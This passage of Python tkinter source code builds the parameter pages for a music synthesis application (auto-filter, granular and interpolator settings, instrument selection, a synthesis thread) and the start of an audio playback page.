menu_gr.config(state=tk.NORMAL)\n                menu_ip.config(state=tk.NORMAL)\n            else:\n                synth_af.config(state=tk.DISABLED)\n                synth_gr.config(state=tk.DISABLED)\n                synth_ip.config(state=tk.DISABLED)\n                \n                menu_af.config(state=tk.DISABLED)\n                menu_gr.config(state=tk.DISABLED)\n                menu_ip.config(state=tk.DISABLED)\n        \n        \n        # Create a boolean variable to store the checkbox value\n        self.custom = tk.BooleanVar()\n        self.custom.set(False)\n        \n        # Create the checkbox\n        custom_checkbox = tk.Checkbutton(self, text=\"Customize Parameters\",\n                                         variable = self.custom,\n                                         command=toggle_buttons)\n        \n        # Position the checkbox and filename entry widgets in the GUI window\n        
custom_checkbox.grid(row=row, column=1, columnspan=3, sticky=\"w\", padx=10, pady=10)\n        \n        info0 = tk.Button(self, text=\" Info* \", font = (\"Helvetica\", \"10\", \"bold\"),\n                         command=lambda: controller.show_frame(\"INFO_CUSTOMIZE_PARAMETERS\"))\n        info0.grid(row=row, column=2)\n        \n        row+=1\n        \n        ############################# Synth Parameters ##################################\n        param_frame = tk.Frame(self, padx=10, \n                               highlightbackground=\"black\", highlightthickness=1)\n        param_frame.grid(row=row, column=1, columnspan=5, pady=10, sticky='nsew')\n        \n        # Create five columns\n        for i in range(5):\n            param_frame.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n\n        \n        # Place widgets using grid()\n        label1 = tk.Label(param_frame, text=\" \")\n        label1.grid(row=0, column=0)\n        \n        label2 = tk.Label(param_frame, text=\" \")\n        label2.grid(row=0, column=1)\n        \n        label3 = tk.Label(param_frame, text=\" \")\n        label3.grid(row=0, column=2)\n        \n        label4 = tk.Label(param_frame, text=\" \")\n        label4.grid(row=0, column=3)\n        \n        label5 = tk.Label(param_frame, text=\" \")\n        label5.grid(row=0, column=4)\n        \n        param_row=0\n        label_synths = tk.Label(param_frame, text=\"Synth Units Parameters\",\n                                font=('Helvetica', 16))\n        label_synths.grid(row=param_row, column=0, columnspan=3, sticky='w')\n        param_row+=1\n        \n        self.af_param = list()\n        self.gr_param = list()\n        self.ip_param = list()\n        \n        synth_af = tk.Button(param_frame, text=\"Auto-Filter\", state=tk.DISABLED,\n                             command=lambda: controller.show_frame(\"PageSeven\"))\n        synth_gr = tk.Button(param_frame, text=\"Granular\", state=tk.DISABLED,\n                             command=lambda: controller.show_frame(\"PageEight\"))\n        synth_ip = tk.Button(param_frame, text=\"Interpolator\", state=tk.DISABLED,\n                             command=lambda: controller.show_frame(\"PageNine\"))\n        \n        synth_pad=20\n        synth_af.grid(row=param_row, column=0, pady=synth_pad, padx=20)\n        synth_gr.grid(row=param_row, column=2, pady=synth_pad, padx=20)\n        synth_ip.grid(row=param_row, column=4, pady=synth_pad, padx=20)\n        row+=1\n        \n        ############################# Synth Instruments #################################\n        inst_frame = tk.Frame(self, padx=10,\n                              highlightbackground=\"black\", highlightthickness=1)\n        inst_frame.grid(row=row, column=1, columnspan=5, pady=10, sticky='nsew')\n        \n        # Create five columns\n        for i in range(5):\n            inst_frame.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n        \n        \n        # Place widgets using grid()\n        label12 = tk.Label(inst_frame, text=\" \")\n        label12.grid(row=0, column=0)\n        \n        label22 = tk.Label(inst_frame, text=\" \")\n        label22.grid(row=0, column=1)\n        \n        label32 = tk.Label(inst_frame, text=\" \")\n        label32.grid(row=0, column=2)\n        \n        label42 = tk.Label(inst_frame, text=\" \")\n        label42.grid(row=0, column=3)\n        \n        label52 = tk.Label(inst_frame, text=\" \")\n        label52.grid(row=0, column=4)\n        \n        inst_row=1\n        label_inst = tk.Label(inst_frame, text=\"Choose Synths' Instruments\",\n                              font=('Helvetica', 16))\n        label_inst.grid(row=inst_row, column=0, columnspan=3, sticky='w')\n        inst_row+=1\n        \n        \n        OPTIONS = [\"Bass\", \"Harmony\", \"Melody\"]\n        \n        def check_combination(menu_vars, button):\n            if len(set(menu_vars)) == len(menu_vars):\n                button.config(state=\"normal\")\n            else:\n                button.config(state=\"disabled\")\n        \n        self.inst_af = tk.StringVar(value=\"Bass\")\n        self.inst_gr = tk.StringVar(value=\"Harmony\")\n        self.inst_ip = tk.StringVar(value=\"Melody\")\n        \n        def set_inst_af(self, value):\n            self.inst_af.set(str(value))\n        def set_inst_gr(self, value):\n            self.inst_gr.set(str(value))\n        def set_inst_ip(self, value):\n            
self.inst_ip.set(str(value))\n \n menu_af = tk.OptionMenu(inst_frame, self.inst_af, *OPTIONS, \n command= combine_funcs(lambda selected: check_combination([self.inst_af.get(),\n self.inst_gr.get(), self.inst_ip.get()], self.start_synth),\n lambda value: set_inst_af(self,value)))\n \n \n menu_gr = tk.OptionMenu(inst_frame, self.inst_gr, *OPTIONS, \n command= combine_funcs(lambda selected: check_combination([self.inst_af.get(),\n self.inst_gr.get(), self.inst_ip.get()], self.start_synth),\n lambda value: set_inst_gr(self,value)))\n \n\n menu_ip = tk.OptionMenu(inst_frame, self.inst_ip, *OPTIONS, \n command= combine_funcs(lambda selected: check_combination([self.inst_af.get(),\n self.inst_gr.get(), self.inst_ip.get()], self.start_synth),\n lambda value: set_inst_ip(self,value)))\n \n menu_af.config(state=\"disabled\")\n menu_gr.config(state=\"disabled\")\n menu_ip.config(state=\"disabled\")\n \n pad_menu=20\n menu_af.grid(row=inst_row, column=0, pady=pad_menu, padx=20)\n menu_gr.grid(row=inst_row, column=2, pady=pad_menu, padx=20)\n menu_ip.grid(row=inst_row, column=4, pady=pad_menu, padx=20)\n \n initial_values = [self.inst_af.get(), self.inst_gr.get(), self.inst_ip.get()]\n if len(set(initial_values)) == len(initial_values):\n initial_state = \"normal\"\n else:\n initial_state = \"disabled\"\n \n self.t_synth=threading.Thread(target=self.run_synth) \n \n self.start_synth = tk.Button(self, text=\"Start Synthesis\",\n font=('Helvetica', 18), state=initial_state,\n command=combine_funcs(lambda: self.start_synth.config(text=\"Creating...\",\n state= tk.DISABLED, width = 40),\n self.Threading))#controller.show_frame(\"PageTen\"))\n self.start_synth.config(width=20)\n\n row+=1\n \n self.start_synth.grid(row=row, column=1, columnspan=5, pady=20)\n row+=1\n\n #################################################################################################\n \n def Threading(self):\n # Call work function\n self.event = threading.Event()\n\n self.t_synth.start()\n \n def run_synth(self):\n \n #get synths vector (which synth was chosen for each instrument) #############################\n synth_id={'Bass': 0, 'Harmony': 1, 'Melody': 2}\n synths=[-1,-1,-1]\n \n #discover idx of that synth, in the order bass harmony melody\n idx_af = synth_id[str(self.inst_af.get())]\n idx_gr = synth_id[str(self.inst_gr.get())]\n idx_ip = synth_id[str(self.inst_ip.get())]\n \n #for that idx insert the code of that synth-> 0: af; 1:gr, 2:ip\n synths[idx_af] = 0\n synths[idx_gr] = 1\n synths[idx_ip] = 2\n \n ######################### ALOCATE PARAMETERS FOR IND_SYNTH ################################\n if self.custom.get():\n af_param = self.af_param\n gr_param = self.gr_param\n ip_param = self.ip_param\n \n params_synths = [af_param, gr_param, ip_param]\n Ind_synth = [-1,-1,-1]\n\n idxs = [idx_af, idx_gr, idx_ip]\n #place synth params in the correct instrument: Ind_param[param_bass, param_harmony, param_melody]\n for idx, params in zip(idxs, params_synths):\n Ind_synth[idx] = params\n else: Ind_synth=list()\n #############################################################################################\n \n user_info = self.controller.frames['PageFour'].in_gen2['user_info']\n midi_info_out = self.controller.frames['PageFour'].in_gen2['midi_info_out']\n info_GA = self.controller.frames['PageFour'].in_gen1['info_GA']\n sample_info = self.controller.frames['PageFour'].in_gen2['sample_info']\n Ind_sample = self.controller.frames['PageFour'].out_ga['sample_Ind']\n midi_info_real = 
self.controller.frames['PageFour'].in_gen2['midi_info_real']\n \n from main import main_synth_GA\n synth_path = main_synth_GA(user_info, midi_info_out, info_GA, sample_info,\n Ind_sample, Ind_synth, synths, midi_info_real, self.start_synth)\n \n self.out_synth_path = synth_path\n \n \n self.start_synth.configure(text = \"Listen to Arrangement!\", state= tk.NORMAL, width = 25,\n command = lambda: self.controller.show_frame(\"PageTen\"))\n \nclass PageSeven(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n # Create five columns\n for i in range(5):\n if i!=2:\n self.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n \n # Place widgets using grid()\n label1 = tk.Label(self, text=\" \")\n label1.grid(row=0, column=0)\n \n label2 = tk.Label(self, text=\" \")\n label2.grid(row=0, column=1)\n \n label3 = tk.Label(self, text=\" \")\n label3.grid(row=0, column=2)\n \n label4 = tk.Label(self, text=\" \")\n label4.grid(row=0, column=3)\n \n label5 = tk.Label(self, text=\" \")\n label5.grid(row=0, column=4)\n \n row = 1\n \n slider_length = 300\n row+=1\n \n row=0\n \n label = tk.Label(self, text=\"Auto-Filter\", font=controller.title_font)\n #label.pack(side=\"top\", fill=\"x\", pady=10)\n label.grid(row=row, column=1 , columnspan=3, pady=20, sticky=\"nsew\")\n row+=1\n \n ################################# INIT VARIABLES ###################################\n #cutoff_floor=50\n self.cutoff_floor = tk.DoubleVar()\n self.cutoff_ceiling = tk.DoubleVar()\n self.lfo_floor = tk.DoubleVar()\n self.lfo_ceiling = tk.DoubleVar()\n self.lfo_shape = tk.StringVar(value=\"sine\")\n self.lfo_evo = tk.StringVar(value=\"random\")\n self.high_pass = tk.BooleanVar()\n \n self.cutoff_floor.set(20) \n self.cutoff_ceiling.set(10_000) \n self.lfo_floor.set(1) \n self.lfo_ceiling.set(8) \n\n self.high_pass.set(False)\n \n self.min_cutoff_floor = 8\n self.max_cutoff_floor = 199\n self.min_cutoff_ceiling = 200\n self.max_cutoff_ceiling = 20_000\n self.min_lfo_floor = 0.01\n self.max_lfo_floor = 4.9\n self.min_lfo_ceiling = 5\n self.max_lfo_ceiling = 10\n \n \n def set_cutoff_floor(self, value):\n self.cutoff_floor.set(float(value))\n def set_cutoff_ceiling(self, value):\n self.cutoff_ceiling.set(float(value))\n def set_lfo_floor(self, value):\n self.lfo_floor.set(float(value))\n def set_lfo_ceiling(self, value):\n self.lfo_ceiling.set(float(value))\n def set_lfo_shape(self, value):\n self.lfo_shape.set(str(value))\n def set_lfo_evo(self, value):\n self.lfo_evo.set(str(value))\n def set_high_pass(self, value):\n self.high_pass.set(bool(value))\n \n ########################################## SLIDERS #######################################\n \n cutoff_floor_slider = tk.Scale(self, variable=self.cutoff_floor, from_= self.min_cutoff_floor,\n to=self.max_cutoff_floor, resolution=1, orient = 'horizontal',\n length = slider_length,\n command= lambda value: set_cutoff_floor(self,value))\n \n cutoff_ceiling_slider = tk.Scale(self, variable=self.cutoff_ceiling, from_= self.min_cutoff_ceiling,\n to=self.max_cutoff_ceiling, resolution=1, orient = 'horizontal',\n length = slider_length,\n command= lambda value: set_cutoff_ceiling(self,value))\n \n lfo_floor_slider = tk.Scale(self, variable=self.lfo_floor, from_= self.min_lfo_floor, \n to= self.max_lfo_floor, resolution=0.1, orient = 'horizontal',\n length = slider_length,\n command= lambda value: set_lfo_floor(self,value))\n \n lfo_ceiling_slider = tk.Scale(self, variable=self.lfo_ceiling, from_= 
self.min_lfo_ceiling,\n to=self.max_lfo_ceiling, resolution=0.1, orient = 'horizontal',\n length = slider_length,\n command= lambda value: set_lfo_ceiling(self,value))\n \n ######################################### MENUS ####################################\n shapes = ['sine', 'square', 'triangle', 'sawl', 'sawr']\n evos = ['constant', 'linear_up', 'linear_down', 'exp_up', 'exp_down', 'random']\n \n menu_lfo_shape = tk.OptionMenu(self, self.lfo_shape, *shapes, \n command= lambda value: set_lfo_shape(self,value))\n menu_lfo_evo = tk.OptionMenu(self, self.lfo_evo, *evos, \n command= lambda value: set_lfo_evo(self,value))\n \n high_pass_checkbox = tk.Checkbutton(self, text=\"High-Pass Filter\", variable=self.high_pass, anchor='w',\n command= lambda value: set_high_pass(self, value)) \n\n ######################################### GRID ####################################\n ## CUTOFF FLOOR ##########################\n \n label_cutoff_floor = tk.Label(self, text='Cutoff Minimum', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_cutoff_floor.grid(row=row, column=0, columnspan=2, sticky = 'SW', padx=20)\n \n info1 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_CUTOFF\"))\n info1.grid(row=row, column=1, sticky = 'S')\n \n cutoff_floor_slider.grid(row=row, column=2, columnspan=2)\n \n cutoff_floor_min = tk.Label(self, text = str(self.min_cutoff_floor),\n font=('Helvetica', \"10\"))\n cutoff_floor_min.grid(row=row, column=1, sticky = 'SE')\n \n cutoff_floor_max = tk.Label(self, text=str(self.max_cutoff_floor)+ \" Hz\",\n font=('Helvetica', \"10\"))\n cutoff_floor_max.grid(row=row, column=4, sticky = 'SW')\n row+=1\n \n ## CUTOFF CEILING ##########################\n \n label_cutoff_ceiling = tk.Label(self, text='Cutoff Maximum', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_cutoff_ceiling.grid(row=row, column=0, columnspan=2, sticky = 'SW', padx=20)\n \n info2 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_CUTOFF\"))\n info2.grid(row=row, column=1, sticky = 'S')\n \n \n cutoff_ceiling_slider.grid(row=row, column=2, columnspan=2)\n \n cutoff_ceiling_min = tk.Label(self, text = str(self.min_cutoff_ceiling),\n font=('Helvetica', \"10\"))\n cutoff_ceiling_min.grid(row=row, column=1, sticky = 'SE')\n \n cutoff_ceiling_max = tk.Label(self, text=str(20)+'K'+ \" Hz\",\n font=('Helvetica', \"10\"))\n cutoff_ceiling_max.grid(row=row, column=4, sticky = 'SW')\n row+=1\n \n ## LFO FLOOR ##########################\n \n label_lfo_floor = tk.Label(self, text='LFO Minimum', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_lfo_floor.grid(row=row, column=0, columnspan=2, sticky = 'SW', padx=20)\n \n info3 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_LFO\"))\n info3.grid(row=row, column=1, sticky = 'S')\n \n lfo_floor_slider.grid(row=row, column=2, columnspan=2)\n \n lfo_floor_min = tk.Label(self, text = str(self.min_lfo_floor),\n font=('Helvetica', \"10\"))\n lfo_floor_min.grid(row=row, column=1, sticky = 'SE')\n \n lfo_floor_max = tk.Label(self, text=str(self.max_lfo_floor)+ \" Hz\",\n font=('Helvetica', \"10\"))\n lfo_floor_max.grid(row=row, column=4, sticky = 'SW')\n row+=1\n \n ## LFO CEILING ##########################\n \n label_lfo_ceiling = tk.Label(self, text='LFO Maximum', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_lfo_ceiling.grid(row=row, 
column=0, columnspan=2, sticky = 'SW', padx=20)\n        \n        info4 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n                         command=lambda: controller.show_frame(\"INFO_LFO\"))\n        info4.grid(row=row, column=1, sticky = 'S')\n        \n        lfo_ceiling_slider.grid(row=row, column=2, columnspan=2)\n        \n        lfo_ceiling_min = tk.Label(self, text = str(self.min_lfo_ceiling),\n                                   font=('Helvetica', \"10\"))\n        lfo_ceiling_min.grid(row=row, column=1, sticky = 'SE')\n        \n        lfo_ceiling_max = tk.Label(self, text=str(self.max_lfo_ceiling) + \" Hz\",\n                                   font=('Helvetica', \"10\"))\n        lfo_ceiling_max.grid(row=row, column=4, sticky = 'SW')\n        row+=1\n        \n        ########### lfo shape & lfo evo ##########\n        \n        label_lfo_shape = tk.Label(self, text='LFO Shape & EVO', font=(\"Helvetica\", \"11\"),\n                                   justify=\"left\")\n        label_lfo_shape.grid(row=row, column=0, columnspan=2, sticky = 'SW', padx=20, pady=10)\n        \n        info5 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n                         command=lambda: controller.show_frame(\"INFO_LFO_SHAPE_EVO\"))\n        info5.grid(row=row, column=1, sticky = 'S', pady=10)\n        \n        menu_lfo_shape.grid(row=row, column=2, sticky='S', pady=10)  \n        menu_lfo_evo.grid(row=row, column=3, sticky='SW', pady=10)\n        \n        high_pass_checkbox.grid(row=row, column=3, sticky='SE', pady=10)\n        row+=1\n        \n        go_back = tk.Button(self, text=\"Save Parameters\", font=('Helvetica', 14),\n                            command= combine_funcs(self.save_params, lambda: controller.show_frame(\"PageSix\")))\n        go_back.grid(row=row, column=4, pady=20, columnspan=2, sticky='S', padx=20)\n        row+=1\n        \n        \n    def save_params(self):\n        #normalize (0 to 1)\n        cutoff_floor = (self.cutoff_floor.get() - self.min_cutoff_floor) / (self.max_cutoff_floor - self.min_cutoff_floor)\n        cutoff_ceiling = (self.cutoff_ceiling.get() - self.min_cutoff_ceiling) / (self.max_cutoff_ceiling - self.min_cutoff_ceiling)\n        lfo_floor = (self.lfo_floor.get() - self.min_lfo_floor) / (self.max_lfo_floor - self.min_lfo_floor)\n        lfo_ceiling = (self.lfo_ceiling.get() - self.min_lfo_ceiling) / (self.max_lfo_ceiling - self.min_lfo_ceiling)  \n        \n        \n        af_param = [[float(cutoff_floor), float(cutoff_ceiling), float(lfo_floor),\n                     float(lfo_ceiling), str(self.lfo_shape.get()), str(self.lfo_evo.get()), bool(self.high_pass.get())]]\n        af_param *= self.controller.frames['PageSix'].max_sections\n        \n        \n        self.controller.frames['PageSix'].af_param = af_param\n        \n        \nclass PageEight(tk.Frame):\n\n    def __init__(self, parent, controller):\n        tk.Frame.__init__(self, parent)\n        self.controller = controller\n        \n        # Create seven columns\n        for i in range(7):\n            self.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n        \n        # Place widgets using grid()\n        label1 = tk.Label(self, text=\" \")\n        label1.grid(row=0, column=0)\n        \n        label2 = tk.Label(self, text=\" \")\n        label2.grid(row=0, column=1)\n        \n        label3 = tk.Label(self, text=\" \")\n        label3.grid(row=0, column=2)\n        \n        label4 = tk.Label(self, text=\" \")\n        label4.grid(row=0, column=3)\n        \n        label5 = tk.Label(self, text=\" \")\n        label5.grid(row=0, column=4)\n        \n        label6 = tk.Label(self, text=\" \")\n        label6.grid(row=0, column=5)\n        \n        label7 = tk.Label(self, text=\" \")\n        label7.grid(row=0, column=6)\n        \n        row = 1\n        \n        slider_length = 350\n        \n        label = tk.Label(self, text=\"Granular\", font=controller.title_font)\n        label.grid(row=row, column=2 , columnspan=3, pady=20, sticky=\"nsew\")\n        row+=1\n        \n        ############################## init variables ##########################\n        \n        self.grain_size = tk.DoubleVar()\n        self.grain_space = tk.DoubleVar()\n        self.order = tk.BooleanVar()\n        self.smoothing = 
tk.BooleanVar()\n self.sync = tk.BooleanVar()\n \n self.grain_size.set(0.005) \n self.grain_space.set(0.005) \n \n self.min_grain_size = 0.001\n self.max_grain_size = 0.01\n self.min_grain_space = 0.001\n self.max_grain_space = 0.01\n \n def set_grain_size(self, value):\n self.grain_size.set(float(value))\n def set_grain_space(self, value):\n self.grain_space.set(float(value))\n def set_order(self, value):\n self.order.set(bool(value))\n def set_smoothing(self, value):\n self.smoothing.set(bool(value))\n def set_sync(self, value):\n self.sync.set(bool(value))\n \n ##################################### grain size ############################\n \n label_grain_size = tk.Label(self, text='Grain Size', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_grain_size.grid(row=row, column=0, columnspan=2, sticky = 'SW', padx=20)\n \n info1 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_GRAIN_SIZE\"))\n info1.grid(row=row, column=1, sticky = 'SE')\n \n grain_size_slider = tk.Scale(self, variable=self.grain_size, from_= self.min_grain_size,\n to=self.max_grain_size, resolution=0.001, length= slider_length,\n orient = 'horizontal', command= lambda value: set_grain_size(self, value))\n \n grain_size_slider.grid(row=row, column=3, columnspan=3)\n \n grain_size_min = tk.Label(self, text = str(self.min_grain_size),\n font=('Helvetica', \"10\"))\n grain_size_min.grid(row=row, column=2, sticky = 'SE')\n \n grain_size_max = tk.Label(self, text=str(self.max_grain_size) + \" s\",\n font=('Helvetica', \"10\"))\n grain_size_max.grid(row=row, column=6, sticky = 'SW')\n \n row+=1\n \n ################################### grain_space ##############################\n \n label_grain_space = tk.Label(self, text='Grain Space', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_grain_space.grid(row=row, column=0, columnspan=2, sticky = 'SW', padx=20)\n \n info2 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_GRAIN_SPACE\"))\n info2.grid(row=row, column=1, sticky = 'SE')\n \n grain_space_slider = tk.Scale(self, variable=self.grain_space, from_=self.min_grain_space,\n to=self.max_grain_space, resolution=0.001, length= slider_length,\n orient = 'horizontal', command= lambda value: set_grain_space(self, value))\n \n grain_space_slider.grid(row=row, column=3, columnspan=3)\n \n grain_space_min = tk.Label(self, text = str(self.min_grain_space),\n font=('Helvetica', \"10\"))\n grain_space_min.grid(row=row, column=2, sticky = 'SE')\n \n grain_space_max = tk.Label(self, text=str(self.max_grain_space) + \" s\",\n font=('Helvetica', \"10\"))\n grain_space_max.grid(row=row, column=6, sticky = 'SW')\n\n row+=1\n \n ########################## checkboxes #########################################\n check_size=10\n \n ### order\n label_grain_order = tk.Label(self, text='Grain Order', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_grain_order.grid(row=row, column=0, columnspan=2, sticky = 'W', padx=20)\n \n info3 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_GRAIN_ORDER\"))\n info3.grid(row=row, column=1, sticky = 'SE', pady=15)\n \n \n order_checkbox = tk.Checkbutton(self, variable=self.order,\n command= lambda value: set_order(self, value))\n \n order_checkbox.grid(row=row, column=1, sticky = 'S', pady = 15)\n \n \n ### smoothing\n \n label_smoothing = tk.Label(self, text='Smoothing', 
font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_smoothing.grid(row=row, column=2, columnspan=2, sticky = 'W', padx=20)\n \n info4 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_SMOOTHING\"))\n info4.grid(row=row, column=3, sticky = 'SE', pady=15)\n \n \n smoothing_checkbox = tk.Checkbutton(self, variable=self.smoothing,\n command= lambda value: set_smoothing(self, value))\n \n smoothing_checkbox.grid(row=row, column=3, sticky = 'S', pady = 15)\n \n \n ### even spacing\n \n label_spacing = tk.Label(self, text='Even Spacing', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_spacing.grid(row=row, column=4, columnspan=2, sticky = 'nsew', padx=10)\n \n info4 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_EVEN_SPACING\"))\n info4.grid(row=row, column=5, sticky = 'SE', pady=15)\n \n \n sync_checkbox = tk.Checkbutton(self, variable=self.sync, \n command= lambda value: set_sync(self, value))\n \n sync_checkbox.grid(row=row, column=5, sticky = 'S', pady = 15)\n \n row+=1\n \n go_back = tk.Button(self, text=\"Save Parameters\", font=('Helvetica', 14),\n command= combine_funcs(self.save_params, lambda: controller.show_frame(\"PageSix\")))\n go_back.grid(row=row, column=5, pady=20, columnspan=2, sticky='S')\n \n \n def save_params(self):\n #normalize (0 to 1)\n grain_size = (self.grain_size.get() - self.min_grain_size) / (self.max_grain_size - self.min_grain_size)\n grain_space = (self.grain_space.get() - self.min_grain_space) / (self.max_grain_space - self.min_grain_space)\n \n gr_param = [[float(grain_size), float(grain_space), bool(self.order.get()),\n bool(self.smoothing.get()), bool(self.sync.get())]]\n gr_param *= self.controller.frames['PageSix'].max_sections\n \n self.controller.frames['PageSix'].gr_param = gr_param\n\nclass PageNine(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n # Create five columns\n for i in range(7):\n self.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n \n # Place widgets using grid()\n label1 = tk.Label(self, text=\" \")\n label1.grid(row=0, column=0)\n \n label2 = tk.Label(self, text=\" \")\n label2.grid(row=0, column=1)\n \n label3 = tk.Label(self, text=\" \")\n label3.grid(row=0, column=2)\n \n label4 = tk.Label(self, text=\" \")\n label4.grid(row=0, column=3)\n \n label5 = tk.Label(self, text=\" \")\n label5.grid(row=0, column=4)\n \n label6 = tk.Label(self, text=\" \")\n label6.grid(row=0, column=5)\n \n label7 = tk.Label(self, text=\" \")\n label7.grid(row=0, column=6)\n \n row = 1\n \n label = tk.Label(self, text=\"Interpolator\", font=controller.title_font)\n label.grid(row=row, column=2, columnspan=3, pady=20, sticky=\"nsew\")\n row+=1\n \n \n self.signal_shape = tk.StringVar(value=\"sine\")\n self.signal_evo = tk.StringVar(value=\"random\")\n \n def set_signal_shape(self, value):\n self.signal_shape.set(str(value))\n def set_signal_evo(self, value):\n self.signal_evo.set(str(value))\n\n shapes = ['sine', 'square', 'triangle', 'sawl', 'sawr']\n evos = ['constant', 'linear_up', 'linear_down', 'exp_up', 'exp_down', 'random']\n \n menu_signal_shape = tk.OptionMenu(self, self.signal_shape, *shapes,\n command= lambda value: set_signal_shape(self, value))\n menu_signal_evo = tk.OptionMenu(self, self.signal_evo, *evos,\n command= lambda value: set_signal_evo(self, value))\n\n\n label_signal = tk.Label(self, text='Signal 
Shape & \"EVO\"', font=(\"Helvetica\", \"12\"),\n justify=\"left\")\n label_signal.grid(row=row, column=0, columnspan=2, sticky = 'SW', padx=20, pady=10)\n \n info1 = tk.Button(self, text=\" * \", font = (\"Helvetica\", \"10\", \"bold\"),\n command=lambda: controller.show_frame(\"INFO_SIGNAL_SHAPE_EVO\"))\n info1.grid(row=row, column=2, sticky = 'SW', pady=10)\n \n menu_signal_shape.grid(row=row, column=3, sticky='S', pady=10) \n menu_signal_evo.grid(row=row, column=4, sticky='SW', pady=10) \n \n row+=1\n \n go_back = tk.Button(self, text=\"Save Parameters\", font=('Helvetica', 14),\n command= combine_funcs(self.save_params, lambda: controller.show_frame(\"PageSix\")))\n go_back.grid(row=row, column=5, pady=20, columnspan=2, sticky='S')\n \n \n \n def save_params(self):\n ip_param = [[str(self.signal_shape.get()), str(self.signal_evo.get())]]\n ip_param *= self.controller.frames['PageSix'].max_sections\n \n self.controller.frames['PageSix'].ip_param = ip_param \n \n \nclass PageTen(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n \n # Create five columns\n for i in range(7):\n self.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n\n \n # Place widgets using grid()\n label1 = tk.Label(self, text=\" \")\n label1.grid(row=0, column=0)\n \n label2 = tk.Label(self, text=\" \")\n label2.grid(row=0, column=1)\n \n label3 = tk.Label(self, text=\" \")\n label3.grid(row=0, column=2)\n \n label4 = tk.Label(self, text=\" \")\n label4.grid(row=0, column=3)\n \n label5 = tk.Label(self, text=\" \")\n label5.grid(row=0, column=4)\n \n label6 = tk.Label(self, text=\" \")\n label6.grid(row=0, column=5)\n \n label7 = tk.Label(self, text=\" \")\n label7.grid(row=0, column=6)\n \n row=1\n \n label = tk.Label(self, text=\"Final Arrangement\\n(with Synth)\", font=controller.title_font)\n label.grid(row=row, column=0, columnspan=7, pady=10)\n row+=1\n \n main_path = self.controller.shared_data[\"main_path\"]\n \n #create playlist mixer\n self.mixer = pygame.mixer\n self.mixer.init()\n\n\n ###################################### icons ####################################\n #icon_path = main_path + '/GUI/icons/'\n icon_path = main_path + '/icons/'\n \n play_img = Image.open(icon_path + 'play.png')\n pause_img = Image.open( icon_path + 'pause.png')\n stop_img = Image.open( icon_path + 'stop.png')\n backward_img = Image.open( icon_path + 'backward.png')\n forward_img = Image.open( icon_path + 'forward.png')\n \n play_img = play_img.resize((20, 20))\n pause_img = pause_img.resize((20, 20))\n stop_img = stop_img.resize((20, 20))\n backward_img = backward_img.resize((20, 20))\n forward_img = forward_img.resize((20, 20))\n \n play_icon = ImageTk.PhotoImage(image = play_img, master = controller)\n pause_icon = ImageTk.PhotoImage(image = pause_img, master = controller)\n stop_icon = ImageTk.PhotoImage(image = stop_img, master = controller)\n backward_icon = ImageTk.PhotoImage(image = backward_img, master = controller)\n forward_icon = ImageTk.PhotoImage(image = forward_img, master = controller)\n \n ########################################## mp3 #######################################\n mp3_frame = tk.Frame(self, padx=10, pady=10,\n highlightbackground=\"black\", highlightthickness=1)\n mp3_frame.grid(row=row, column=1, columnspan=5, pady=10, sticky='nsew')\n \n for i in range(5):\n mp3_frame.grid_columnconfigure(i, weight=1, uniform=\"equal\")\n \n pady_mp3 = 20\n \n self.paused = False\n self.save_start = 0\n \n play_btn = tk.Button(mp3_frame, 
image=play_icon, borderwidth=0, command= self.Play_Song)\n        pause_btn = tk.Button(mp3_frame, image=pause_icon, borderwidth=0, command= self.Pause_Song)\n        stop_btn = tk.Button(mp3_frame, image=stop_icon, borderwidth=0, command= self.Stop_Song)\n        backward_btn = tk.Button(mp3_frame, image=backward_icon, borderwidth=0, command= self.Backward_Song)\n        forward_btn = tk.Button(mp3_frame, image=forward_icon, borderwidth=0, command= self.Forward_Song)\n        \n        play_btn.image = play_icon\n        pause_btn.image = pause_icon\n        stop_btn.image = stop_icon\n        backward_btn.image = backward_icon\n        forward_btn.image = forward_icon\n        \n        backward_btn.grid(row = row, column = 0, pady=pady_mp3, sticky='nsew')\n        stop_btn.grid(row = row, column = 1, pady=pady_mp3, sticky='nsew')\n        play_btn.grid(row = row, column = 2, pady=pady_mp3, sticky='nsew')\n        pause_btn.grid(row = row, column = 3, pady=pady_mp3, sticky='nsew')\n        forward_btn.grid(row = row, column = 4, pady=pady_mp3, sticky='nsew')\n        \n        row+=1\n        \n        ######################################## volume #######################################\n        \n        def set_volume(val):\n      